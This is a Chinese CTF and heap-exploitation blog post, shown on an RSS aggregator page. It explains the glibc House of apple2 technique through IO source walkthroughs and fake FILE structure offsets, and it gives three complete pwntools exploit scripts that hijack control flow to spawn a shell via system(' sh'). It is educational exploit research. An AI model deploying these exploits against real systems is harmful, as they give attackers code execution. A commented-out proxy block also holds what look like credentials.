惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

B
Blog RSS Feed
C
CERT Recently Published Vulnerability Notes
P
Proofpoint News Feed
Y
Y Combinator Blog
T
The Blog of Author Tim Ferriss
云风的 BLOG
云风的 BLOG
H
Help Net Security
Recorded Future
Recorded Future
The Register - Security
The Register - Security
F
Full Disclosure
N
Netflix TechBlog - Medium
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
酷 壳 – CoolShell
酷 壳 – CoolShell
H
Hackread – Cybersecurity News, Data Breaches, AI and More
爱范儿
爱范儿
Security Archives - TechRepublic
Security Archives - TechRepublic
Simon Willison's Weblog
Simon Willison's Weblog
Cisco Talos Blog
Cisco Talos Blog
I
InfoQ
T
Tenable Blog
T
Tor Project blog
人人都是产品经理
人人都是产品经理
D
DataBreaches.Net
NISL@THU
NISL@THU
Google DeepMind News
Google DeepMind News
博客园 - 叶小钗
B
Blog
V
V2EX
Jina AI
Jina AI
L
LangChain Blog
月光博客
月光博客
W
WeLiveSecurity
U
Unit 42
AWS News Blog
AWS News Blog
C
Cyber Attacks, Cyber Crime and Cyber Security
博客园 - 聂微东
V
Visual Studio Blog
A
Arctic Wolf
T
Tailwind CSS Blog
The Cloudflare Blog
SecWiki News
SecWiki News
S
SegmentFault 最新的问题
Hacker News - Newest:
Hacker News - Newest: "LLM"
宝玉的分享
宝玉的分享
MyScale Blog
MyScale Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
S
Securelist
www.infosecurity-magazine.com
www.infosecurity-magazine.com
腾讯CDC
雷峰网
雷峰网

博客园_首页

Linux实操--组管理、权限管理和定时任务 Java + EasyExcel 实现单个接口导出多个Excel Mem0 源码解析系列(二):提示词工程的深度剖析 Openclaw TaskFlow究竟是什么?和普通Skill技能有什么区别 博文阅读密码验证 - 博客园 嘉立创开源:应该是全网MicroPython教程最多的开发板 Hermes Agent 集成实践:从协议到生产 2026年AI编程工具横评:Cursor、Codex、Claude Code、Zed、Windsurf Java程序员必看的RAG入门教程 2026 AI效率神器:Superpowers + Claude Code 保姆级教程 本地大模型部署全攻略:从 0 到 1 玩转 Ollama 【从0到1构建一个ClaudeAgent】内存管理-上下文压缩 .NET 高级开发 | 设计、实现一个事件总线框架 电子小白入门之NE555 3. WorkBuddy:隐藏玩法,一键召唤专家,让 AI 以"专家身份"给你干活 和AI一起搞事情#3:Claude Teammate 游戏开发翻车实录 【OpenClaw】通过 Nanobot 源码学习架构---(7)Memory C# .NET 周刊|2026年3月3期 我在 Debian 11 上把 K8s 单机搭起来了,过程没你想的那么顺(/opt 目录版) 深度学习进阶(七)Data-efficient Image Transformer CLI+Skill搭建浏览器AI自动化框架,告别一切重复枯燥任务 告别Token账单无底洞:OpenClaw本地部署,重塑企业数据主权的唯一解 FastAPI+Vue:文件分片上传+秒传+断点续传,这坑我帮你踩平了! SBTI 爆火后,我做了个程序员版的 CBTI。。已开源 + 附开发过程 多模态检索开始进入工程期:用 Sentence Transformers 搭建可落地的 Multimodal RAG 100多行代码实现一个最简单的Agent(用ReAct) Claude Code 通关手册(八):推荐 5 个 Hooks,代码质量提升 3 倍 老板:“有人截图了!”。安全部门:“收到,马上查暗水印!” - why技术 技术之外,皆是人间 C#/.NET/.NET Core技术前沿周刊 | 第 69 期(2026年4.01-4.12) Snack JSONPath 项目架构分析 Claude Code Buddy 小析:一个非核心功能,如何体现产品的细节完成度 AI新时代下的图床管理方案-Cloudflare图床+MCP+Skills方案指南 化繁为简:顺丰速运App如何通过 HarmonyOS SDK实现专业级空间测量 从零实现富文本编辑器#13-React非编辑节点的内容渲染 AI开发-python-langchain框架(3-23-OpenAI Functions风格Tool Calling智能助手) .NET + AI 进阶实战:基于类的技能开发 - 打造可治理的 Agent 能力模块 【从0到1构建一个ClaudeAgent】规划与协调-技能 上周热点回顾(4.6-4.12) 电子小白的工具三件套:面包板、杜邦线、万能板 单表五亿数据的查询优化 | Mysql、StarRocks 2. WorkBuddy:从“我是谁”到“帮我干活” C# 如何减少代码运行时间:7 个实战技巧 基于HelixToolkit.SharpDX 渲染3D模型 - 笺上知微 从零开始的双臂具身VLA起源及现阶段发展综述 - SkyXZ 记对 xonsh shell 的使用, 脚本编写, 迁移及调优 - pluvium27 受够了Vibe Coding的失控?换个起点,让AI事半功倍 从开始配置漏洞环境到漏洞复现流程 - 難しい 关于10年工作经验的程序员对OpenClaw的实战经验分享以及看法 - 虚无境 Any metadata 的内存布局 C# .NET 周刊|2026年3月2期 - InCerry 我帮你测过了,测试圈排名第二的 Skill 依然很牛逼 Skill Discovery | 无监督技能发现的经典工作总结 - MoonOut PbootCMS 网站内容数量多导致访问慢?这些实用优化方案帮你提速! - 家兴网络技术工作室 上下文工程是什么?过时了么?一文讲明白! - 一枫说码 网站漏洞怎么发现并修复?一篇实用指南(附完整流程) - 家兴网络技术工作室 开了 TUN 模式还是直连?90% 的人都踩过这个坑 Github日报|2026年04月12日 - AI一族 AScript扩展多种脚本语言 - rockey627 AI 学习笔记:Agent 的记忆机制 你能被装进一个文件里吗?——7 万人把同事"蒸馏"成了 AI - 我没有三颗心脏 Claude Code 通关手册(七):给 AI 装上技能包——Skills 完全指南 - 暮色之狐 在浏览器中快速编辑代码:VSCode Web 集成实践 - Newbe36524 蒸馏自己 skill?基于 Deepseek 的蒸馏器,丐版蒸馏方式,简单便捷 - To_Carpe_Diem Spring AI Aliababa和AgentScope,哪个更好? - 苏三说技术 Etsy 把 1000 个 MySQL 分片迁进 Vitess:425TB 数据背后的真正问题不是性能,而是运维规模 MicroPython LVGL基础知识和概念:底层渲染与性能优化 - FreakStudio 数据库草图算法 Python 潮流周刊#146:CPython 引入 Rust 的进展 - 豌豆花下猫 最小生成树 - mofei1116 红日靶场七:从外网入口、容器逃逸到 AD 接管的完整利用链复盘 - YouDiscovered1t 分享四款开源且实用的 Kafka 管理工具 - 追逐时光者 vLLM 权重加载机制全解析:从挑战到理想架构 LCT 学习笔记 - ACehomoxue Avalonia UI 12.0.0 正式发布:架构演进和性能飞跃 - 张善友 当 AI Agent 把调用链拉长,延迟开始成为一门生意 conhost.exe 无法显示 U+2717 - 145a 太秀了,我把自己蒸馏成了 Skill!已开源 - 程序员鱼皮 ASP.NET Core 内存缓存实战:一篇搞懂该怎么配、怎么避坑 基于 Ghostty 带有分割标签页和为 Claude 编程设计的通知终端 - BugShare AI 焊死入口:教育的“操作系统级”重塑 - 郝hai 初级Java开发工程师使用sql脚本编写代码的过程是简单而且不糊涂 - CoderOilStation Claude Code通关手册(六):MCP协议完全指南 - 暮色之狐 边框灯光环绕动画特效实现指南 - Newbe36524 开源:子木蒸馏版的 SEO 审计工具 seo-audit-skill v1.0 我所理解的Python元模型 【从0到1构建一个ClaudeAgent】规划与协调-TodoWrite - 程序员Seven Claude 和 Codex 在审计 Skill 上性能差异探究 - ACai_sec AScript如何实现中文脚本引擎 - rockey627 【渗透测试】HTB Season10 Garfield 全过程wp - dynasty_chenzi Android 开发者为什么必须掌握 AI 能力?端侧视角下的技术变革 树状数组正确性证明 - AC-wyr 你的 AI 焦虑,可能比 AI 本身更危险——ATM 机没有消灭银行柜员,但恐慌消灭了你的判断力 - 我没有三颗心脏 一个拉胯的分库分表方案有多绝望?整个部门都在救火! - 冰河团队 动态规划入门必学之走方格问题 - Ofnoname PostgREST 与 PostgreSQL 角色权限配置全解析(生产级实践) - SheepDog1998 使用 UEFI 图形输出协议 GOP 在屏幕上显示图像的方法 - 阿源- Claude Code通关手册(五):组建你的AI专家团队,子代理系统 - 暮色之狐 一个程序员到架构师的催婚路之感悟(整整10年后的催婚相亲感悟) - MisterLip 用 Agent Skill 自动生成工作周报 - 赵康
House of apple2手法及部分源码解析
firefly_star · 2026-06-18 · via 博客园_首页

在2.34移除了hook函数之后,堆利用就少了一个大的攻击方向了。而House of apple这个手法就给我们提供了新的攻击方向:IOFILE结构体。虽然在house of orange就有所利用,之后也有一些利用了相关结构体的手法,但都没有House of apple条件简单。

House of apple由roderick01师傅提出,至今仍可使用,原文链接如下House of apple 一种新的glibc中IO攻击方法 (2)

House of apple仅需要泄露libc和堆地址及一次largebin attack即可完成攻击,House of apple有三种利用方式,我目前就讲讲House of apple2。而House of apple2主要利用就是通过largebin attack攻击_IO_list_all把一个堆块伪造成IOFILE结构体,通过在堆块进行IOFILE结构体进行布局,因为 _wide_vtable没有检测虚表的地址范围。伪造虚表 _wide_vtable,当系统调用其中的虚表函数时,我们就可以劫持程序控制流。

利用原理及源码

House of apple2主要利用链原作者给出了三条,我就以第一条为例了,剩下的各位感兴趣可以看看原文。我们知道当我们程序从main函数返回或者exit的时候程序会刷新IO流,主要是通过_IO_flush_all这个函数实现的,相关源码如下:

int
_IO_flush_all (void)
{
  int result = 0;
  FILE *fp;

#ifdef _IO_MTSAFE_IO
  _IO_cleanup_region_start_noarg (flush_cleanup);
  _IO_lock_lock (list_all_lock);
#endif

  for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
    {
      run_fp = fp;
      _IO_flockfile (fp);

      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base))
	   )
	  && _IO_OVERFLOW (fp, EOF) == EOF)#主要利用在_IO_OVERFLOW这个函数后面
	result = EOF;

      _IO_funlockfile (fp);
      run_fp = NULL;
    }

#ifdef _IO_MTSAFE_IO
  _IO_lock_unlock (list_all_lock);
  _IO_cleanup_region_end (0);
#endif

  return result;
}

可以看见他需要满足一些条件

((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base)

满足| |左右两边其中一边即可然后他就会调用_IO_OVERFLOW,其本质是一个宏

#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)
就是这样fp-> __vtable-> __overflow(fp, ch)
因为__overflow距vtable的偏移是0x18,也就是会调用vtable+0x18的函数

也就是此时会进行虚表函数调用,所以如果我们虚表改成_IO_wfile_jumps就会调用 _IO_wfile_jumps这个虚表内的函数,我要讲的第一条链就是利用他调用 _IO_wfile_overflow这个函数,不过首先得先讲讲

_wide_data的结构如下

struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;    /* Current read pointer */
  wchar_t *_IO_read_end;    /* End of get area. */
  wchar_t *_IO_read_base;    /* Start of putback+get area. */
  wchar_t *_IO_write_base;    /* Start of put area. */
  wchar_t *_IO_write_ptr;    /* Current put pointer. */
  wchar_t *_IO_write_end;    /* End of put area. */
  wchar_t *_IO_buf_base;    /* Start of reserve area. */
  wchar_t *_IO_buf_end;        /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;    /* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;    /* Pointer to first valid character of
                   backup area */
  wchar_t *_IO_save_end;    /* Pointer to end of non-current get area. */
  
  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;
  wchar_t _shortbuf[1];
  const struct _IO_jump_t *_wide_vtable;
};

可以看见跟IOFILE结构体是非常像的,要注意的就是其虚表偏移是0xe0

_IO_wfile_overflow的函数内容如下

wint_t
_IO_wfile_overflow (FILE *f, wint_t wch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return WEOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0
      || f->_wide_data->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_wide_data->_IO_write_base == 0)
	{
	  _IO_wdoallocbuf (f);
	  _IO_free_wbackup_area (f);
	  _IO_wsetg (f, f->_wide_data->_IO_buf_base,
		     f->_wide_data->_IO_buf_base, f->_wide_data->_IO_buf_base);

	  if (f->_IO_write_base == NULL)
	    {
	      _IO_doallocbuf (f);
	      _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
	    }
	}
      else
	{
	  /* Otherwise must be currently reading.  If _IO_read_ptr
	     (and hence also _IO_read_end) is at the buffer end,
	     logically slide the buffer forwards one block (by setting
	     the read pointers to all point at the beginning of the
	     block).  This makes room for subsequent output.
	     Otherwise, set the read pointers to _IO_read_end (leaving
	     that alone, so it can continue to correspond to the
	     external position). */
	  if (f->_wide_data->_IO_read_ptr == f->_wide_data->_IO_buf_end)
	    {
	      f->_IO_read_end = f->_IO_read_ptr = f->_IO_buf_base;
	      f->_wide_data->_IO_read_end = f->_wide_data->_IO_read_ptr =
		f->_wide_data->_IO_buf_base;
	    }
	}
      f->_wide_data->_IO_write_ptr = f->_wide_data->_IO_read_ptr;
      f->_wide_data->_IO_write_base = f->_wide_data->_IO_write_ptr;
      f->_wide_data->_IO_write_end = f->_wide_data->_IO_buf_end;
      f->_wide_data->_IO_read_base = f->_wide_data->_IO_read_ptr =
	f->_wide_data->_IO_read_end;

      f->_IO_write_ptr = f->_IO_read_ptr;
      f->_IO_write_base = f->_IO_write_ptr;
      f->_IO_write_end = f->_IO_buf_end;
      f->_IO_read_base = f->_IO_read_ptr = f->_IO_read_end;

      f->_flags |= _IO_CURRENTLY_PUTTING;
      if (f->_flags & (_IO_LINE_BUF | _IO_UNBUFFERED))
	f->_wide_data->_IO_write_end = f->_wide_data->_IO_write_ptr;
    }
  if (wch == WEOF)
    return _IO_do_flush (f);
  if (f->_wide_data->_IO_write_ptr == f->_wide_data->_IO_buf_end)
    /* Buffer is really full */
    if (_IO_do_flush (f) == EOF)
      return WEOF;
  *f->_wide_data->_IO_write_ptr++ = wch;
  if ((f->_flags & _IO_UNBUFFERED)
      || ((f->_flags & _IO_LINE_BUF) && wch == L'\n'))
    if (_IO_do_flush (f) == EOF)
      return WEOF;
  return wch;
}

在House of apple2中我们主要关注else上面的部分

wint_t
_IO_wfile_overflow (FILE *f, wint_t wch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return WEOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0
      || f->_wide_data->_IO_write_base == NULL)
    {
      /* Allocate a buffer if needed. */
      if (f->_wide_data->_IO_write_base == 0)
	{
	  _IO_wdoallocbuf (f);
	  _IO_free_wbackup_area (f);
	  _IO_wsetg (f, f->_wide_data->_IO_buf_base,
		     f->_wide_data->_IO_buf_base, f->_wide_data->_IO_buf_base);

	  if (f->_IO_write_base == NULL)
	    {
	      _IO_doallocbuf (f);
	      _IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
	    }
	}

我们的目标是调用_IO_wdoallocbuf

首先肯定是不能满足f->_flags & _IO_NO_WRITES即flag&0x8==0其次要满足(f-> _flags & _IO_CURRENTLY_PUTTING) == 0
|| f-> _wide_data-> _IO_write_base == NULL即 _wide_data+0x20要等于0,flags &0x800

void
_IO_wdoallocbuf (FILE *fp)
{
  if (fp->_wide_data->_IO_buf_base)
    return;
  if (!(fp->_flags & _IO_UNBUFFERED))
    if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)// _IO_WXXXX调用
      return;
  _IO_wsetb (fp, fp->_wide_data->_shortbuf,
             fp->_wide_data->_shortbuf + 1, 0);
}
libc_hidden_def (_IO_wdoallocbuf)

这里我们要走到 _IO_WDOALLOCATE这里,所以fp-> _wide_data-> _IO_buf_base==0即 _wide_data+0x30要为0

fp->_flags & _IO_UNBUFFERED要不成立,所以flag&2要为0,然后就会调用 _IO_WDOALLOCATE

_IO_WDOALLOCATE是虚表函数,虚表没有变化都是
const struct _IO_jump_t _IO_wstrn_jumps attribute_hidden =
{
  JUMP_INIT_DUMMY,
  JUMP_INIT(finish, _IO_wstr_finish),
  JUMP_INIT(overflow, (_IO_overflow_t) _IO_wstrn_overflow),
  JUMP_INIT(underflow, (_IO_underflow_t) _IO_wstr_underflow),
  JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow),
  JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wstr_pbackfail),
  JUMP_INIT(xsputn, _IO_wdefault_xsputn),
  JUMP_INIT(xsgetn, _IO_wdefault_xsgetn),
  JUMP_INIT(seekoff, _IO_wstr_seekoff),
  JUMP_INIT(seekpos, _IO_default_seekpos),
  JUMP_INIT(setbuf, _IO_default_setbuf),
  JUMP_INIT(sync, _IO_default_sync),
  JUMP_INIT(doallocate, _IO_wdefault_doallocate),
  JUMP_INIT(read, _IO_default_read),
  JUMP_INIT(write, _IO_default_write),
  JUMP_INIT(seek, _IO_default_seek),
  JUMP_INIT(close, _IO_default_close),
  JUMP_INIT(stat, _IO_default_stat),
  JUMP_INIT(showmanyc, _IO_default_showmanyc),
  JUMP_INIT(imbue, _IO_default_imbue)
};#每个指针的间隔在64位下是0x8
_IO_WDOALLOCATE距虚表偏移是0x68所以我们在伪造的虚表地址+0x68的地方填上我们想让他调用的函数即可,其第一个参数IOFILE结构体的是flags字段的地址

总结

综上house of apple2的第一条链就完成了,这里借用一下原文的总结,调用链如下

exit
	fcloseall
		_IO_cleanup
			_IO_flush_all_lockp
				_IO_OVERFLOW
					_IO_wfile_overflow
    					_IO_wdoallocbuf
       	 					_IO_WDOALLOCATE
            					*(fp->_wide_data->_wide_vtable + 0x68)(fp)

fp的设置如下:

  • _flags设置为~(2 | 0x8 | 0x800),如果不需要控制rdi,设置为0即可;如果需要获得shell,可设置为 sh;,注意前面有两个空格
  • vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap/_IO_wfile_jumps_maybe_mmap地址(加减偏移),使其能成功调用_IO_wfile_overflow即可
  • _wide_data设置为可控堆地址A,即满足*(fp + 0xa0) = A
  • _wide_data->_IO_write_base设置为0,即满足*(A + 0x18) = 0
  • _wide_data->_IO_buf_base设置为0,即满足*(A + 0x30) = 0
  • _wide_data->_wide_vtable设置为可控堆地址B,即满足*(A + 0xe0) = B
  • _wide_data->_wide_vtable->doallocate设置为地址C用于劫持RIP,即满足*(B + 0x68) = C

并且为了调用_IO_OVERFLOW需要设置同时还要满足以下条件||左边/右边的一种。

((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
	   || (_IO_vtable_offset (fp) == 0
	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
				    > fp->_wide_data->_IO_write_base)

星途杯——便签

详细题目解析可以看第二届“星途杯”网络安全竞赛pwn全解及第一道ai的wp - firefly_star - 博客园,简单来说就是有UAF,free仅清空use标志不能edit。攻击思路就是先泄露libc和堆地址,然后利用tcache往stdout上分配堆块,这题其实我们打到stdout就可以getshell了,因为stdout他本身就是IO流,所以最后刷新IO流的时候就会刷新到他,只要我们伪造好相关的IOFILE结构即可。这里其实wide_data可以指向他本身,这样可以少布局一个结构。exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
libc = ELF('./libc.so.6')
# libc1=cdll.LoadLibrary('./libc.so.6')
li='./libc.so.6'
'''
socks.set_default_proxy(
    socks.SOCKS5,
    "81.dart.ccsssc.com",
    25790,
    username="1nkvap1o",
    password="cl330rd",
    rdns=True
)
socket.socket = socks.socksocket
'''
flag = 1
if flag:
    p = remote('xt.xl-lab.top',34591)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s))
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00'))
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
def add(s):
    ru(b'cmd>')
    slr(1)
    ru(b'sz:')
    slr(s)
    ru(b'dat:')
    sd(b'a'*s)
def free(s):
    ru(b'cmd>')
    slr(2)
    ru(b'idx:')
    slr(s)
def show(s):
    ru(b'cmd>')
    slr(3)
    ru(b'idx:')
    slr(s)
def edit(s,a):
    ru(b'cmd>')
    slr(4)
    ru(b'idx:')
    slr(s)
    ru(b'dat:')
    sd(a)
add(0x430)
add(0x20)
show(0)
free(0)
show(0)
ru(b'len: 1072\n')
a=u6(6)-0x203b20
ph(a)
libc.address=a
std=libc.sym['_IO_2_1_stdout_']
sy=libc.sym['system']
add(0x100)#2
free(2)
show(2)
ru(b'len: 256\n')
key=u6(8)
ph(key)
add(0x100)#3
add(0x100)#4
free(4)
free(3)
edit(2,p64(std^key)+b'\x00'*0xf8)
add(0x100)
ru(b'cmd>')
slr(1)
ru(b'sz:')
slr(0x100)
ru(b'dat: ')
pay=flat({
0x0:b'  sh',#flags
0x28:1,#_IO_write_ptr
0x68:sy,#wide_data虚表+0x68的位置
0xd8:libc.sym._IO_wfile_jumps,#vtable
0xa0:std,#wide_data
0xe0:std,#wide_data->vtable
0xf8:0},filler=b'\x00')
sd(pay)
ti()

pwner_LEVEL7

相关题目分析可以看看黄河流域pwn的wp(缺的比较多) - firefly_star - 博客园,简单来说就是很多漏洞,有堆溢出有UAF。glibc版本原来是2.31,2.31也可以打house of apple。不过这题我就打largebin attack攻击_IO_list_all了,总体上思路是一样的,就是flags字段在size位之前,如果只用UAF不用堆溢出的话需要前一个堆块申请的大小的最后一个16进制为是8,通过edit前一个堆块的内容去改。当然也可以进行相关布局,不过这题确实没必要,这题我就把wide_data和IOFIELE结构体放在两个堆块上没有放一起了,放一起也一样。exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
flag=0
if flag:
    p = remote('123.56.126.77',1016)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s).encode())
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00'))
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
def build(index,size,data):
    ru(b"input sequence:")
    pay=p64(index)+p64(int(size))+data
    sd(pay)
def add(index,size):
    ru(b'>')
    sd(p32(1))
    build(index,size,b'firefly_star')
def free(i):
    ru(b'>')
    sd(p32(3))
    build(i,32,b'firefly_star')
    ru(b"freeing...")
def edit(i,size,a):
    ru(b'>')
    sd(p32(2))
    build(i,size,b'ziran\x00\x00')
    ru(b"starting to edit:")
    sd(a)
def show(i):
    ru(b'>')
    sd(p32(4))
    build(i,32,b'firefly_star')
    ru(b"leaking...\n")
add(0,0x460)
add(1,0x10)
add(2,0x430)
free(0)
show(0)
a=u6(6)-0x1ecbe0
ph(a)
libc.address=a
lis=libc.sym['_IO_list_all']
sy=libc.sym['system']
rax=a+0xdd237
end=0x98fb6
add(3,0x500)
edit(0,0x10,b'b'*0x10)
show(0)
ru(b'b'*0x10)
heap=u6(4)
ph(heap)
edit(0,0x20,flat(0,0,0,lis-0x20))
free(2)
add(4,0x500)
pay=flat({
0x18:1,#UAF改的是用户的data区,但_IO_list_all里是堆块最开始的地方(包括size和prev_size)所以偏移要-0x10
0x90:heap+0xdf0,
0xc8:libc.sym['_IO_wfile_jumps'],
0xe8:heap+0xdf0},filler=b'\x00')
edit(2,0x200,pay)
pay=flat({
0x28:1,
0x68:sy,
0xe0:heap+0xdf0},filler=b'\x00')
edit(4,0x100,pay)
edit(1,0x18,b'b'*0x10+b'  sh')
ph(lis)
ru(b'>')
sd(p32(2))
build(6,0x20,b'firefly_star')
ti()
2.39版本的apple

那么在glibc2.39下有没有什么变化呢,这里好像还是一点变化,就是0x88这个_lock成员要能够访问才行,不然会直接报错。其他的没什么区别,GLIBC 2.39-0ubuntu8.7的exp如下:

#!/usr/bin/env python3
from pwn import *
import sys
from ctypes import *
#from pwncli import *
import socks
# cli_script()
#from ae64 import AE64
#from pymao import *
context.log_level='debug'
context.arch='amd64'
elf=ELF('./pwn')
libc = ELF('./libc.so.6')
flag=0
if flag:
    p = remote('123.56.126.77',1016)
else:
    p = process('./pwn')
sa = lambda s,n : p.sendafter(s,n)
sla = lambda s,n : p.sendlineafter(s,n)
sl = lambda s : p.sendline(s)
slr = lambda s : p.sendline(str(s))
sd = lambda s : p.send(s)
sdr = lambda s : p.send(str(s).encode())
rc = lambda n : p.recv(n)
ru = lambda s : p.recvuntil(s)
ti = lambda : p.interactive()
rcl = lambda : p.recvline()
leak = lambda name,addr :log.success(name+"--->"+hex(addr))
u6 = lambda a : u64(rc(a).ljust(8,b'\x00'))
i6 = lambda a : int(a,16)
def csu():
    pay=p64(0)+p64(0)+p64(1)
    return pay
def ph(s):
    print(hex(s))
def dbg():
    # context.terminal = ['tmux', 'splitw', '-h']
    gdb.attach(p)#maybe gdbscript='set debug-file-directory ./star'
    pause()
def build(index,size,data):
    ru(b"input sequence:")
    pay=p64(index)+p64(int(size))+data
    sd(pay)
def add(index,size):
    ru(b'>')
    sd(p32(1))
    build(index,size,b'firefly_star')
def free(i):
    ru(b'>')
    sd(p32(3))
    build(i,32,b'firefly_star')
    ru(b"freeing...")
def edit(i,size,a):
    ru(b'>')
    sd(p32(2))
    build(i,size,b'ziran\x00\x00')
    ru(b"starting to edit:")
    sd(a)
def show(i):
    ru(b'>')
    sd(p32(4))
    build(i,32,b'firefly_star')
    ru(b"leaking...\n")
leave=0x400EB7
rbp=0x400b90
add(0,0x460)
add(1,0x10)
add(2,0x430)
free(0)
show(0)
a=u6(6)-0x203b20
ph(a)
libc.address=a
lis=libc.sym['_IO_list_all']
sy=libc.sym['system']
rax=a+0xdd237
end=0x98fb6
add(3,0x500)
edit(0,0x10,b'b'*0x10)
show(0)
ru(b'b'*0x10)
heap=u6(4)
ph(heap)
edit(0,0x20,flat(0,0,0,lis-0x20))
free(2)
add(4,0x500)
pay=flat({
0x18:1,
0x78:heap,
0x90:heap+0xdf0,
0xc8:libc.sym['_IO_wfile_jumps'],
0xe8:heap+0xdf0},filler=b'\x00')
edit(2,0x200,pay)
pay=flat({
0x28:1,
0x68:sy,
0xe0:heap+0xdf0},filler=b'\x00')
edit(4,0x100,pay)
edit(1,0x18,b'b'*0x10+b'  sh')
ph(lis)
ru(b'>')
sd(p32(2))
build(6,0x20,b'firefly_star')
ti()

2026SCTF——heapMage

如果说上面两题还是常规堆体(漏洞非常多,增删改show全都有)那这题就是无show下仅靠堆溢出完成的攻击了,下面我们看看题目,glibc是2.39。比赛的时候没打出来,现在回顾一下。这里我重命名了一下函数方便看
6){_$G3GV5$E1GNWH54DR

free置空了指针没有UAF,看看edit
R(SQW8_}MH2IF27{0H5{GOB

这里注意到写入的长度是固定的0xf0很容易有堆溢出,后面那个检查可以看一下
7BT%8MT{F56GX3GPDCU9PG

简单来说就是检查我们在0xc8的地方写入的数值必须大于0x520或者小于0x1f不然会退出。接下来看看add
4@377SXA%F(H7@7HXQI}P

可以看见只能申请特定的堆块,但注意到这里能申请0xc0大小的堆块,还记得我们edit的长度是0xf0吗,所以这里有堆溢出。

但是,这里我们可以注意到一个问题,他不能show,也就完全是无泄露,而且glibc2.39tcache里有safe_linking机制,我们哪怕有机会在tcache的fd指针上留下areana指针也很难很难爆破出stdout去泄露libc基地址。此时就需要用到tcache stashing这个机制了,我们看看2.39的源码。

  if (in_smallbin_range (nb))#nb是用户所需的大小need byte,如果在smallbin范围里的话
    {
      idx = smallbin_index (nb);#获取该size对应的smallbin索引
      bin = bin_at (av, idx);#获取该索引的smallbin头

      if ((victim = last (bin)) != bin)#victim就是要脱链的堆块,这里就是看要smallbin里最后一个堆块,很显然,如果最后一个堆块是smallbin的头,那不就说明smallbin里没有堆块么
        {
          bck = victim->bk;#bck就是要脱链的堆块的前一个堆块(逻辑上的前,即链表前由于smallbin是FIFO机制所以前一个堆块是后进入smallbin的)
	  if (__glibc_unlikely (bck->fd != victim))#检查链表完整性,很好理解,前一个堆块的下一个堆块是不是他本身
	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
          set_inuse_bit_at_offset (victim, nb);#设置P位
          bin->bk = bck;#脱链了,把smallbin的头的bk指向了victim的前一个堆块
          bck->fd = bin;#把victim的前一个堆块的bk指针指向了smallbin的头,把victim脱出smallbin链表内

          if (av != &main_arena)#如果不是主arena,设置非主arena标志
	    set_non_main_arena (victim);
          check_malloced_chunk (av, victim, nb);#检查堆块
#if USE_TCACHE
	  /* While we're here, if we see other chunks of the same size,
